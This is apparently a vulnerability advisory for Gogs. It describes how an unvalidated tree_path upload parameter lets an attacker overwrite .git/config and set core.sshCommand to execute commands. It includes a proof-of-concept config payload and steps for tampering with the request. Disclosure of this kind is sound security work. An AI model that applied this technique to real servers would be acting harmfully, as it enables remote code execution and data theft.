Remote Command Execution in uploading repository file in gogs/gogs
Mar 11th 2022
When uploading a file to the repository in Gogs, the
tree_path parameter is not been validated. The attacker can set
tree_path=/.git/ to upload file into the
.git/config file and set
core.sshCommand, which leads to remote command execution vulnerability.
Proof of Concept
Create a repository in Gogs, upload a file
config to the repository on the web page:
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = firstname.lastname@example.org:torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Intercept the HTTP POST form submitting request, and set parameter to
tree_path=/.git/ in request body.
Then a file with text
pwnned is created in
This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.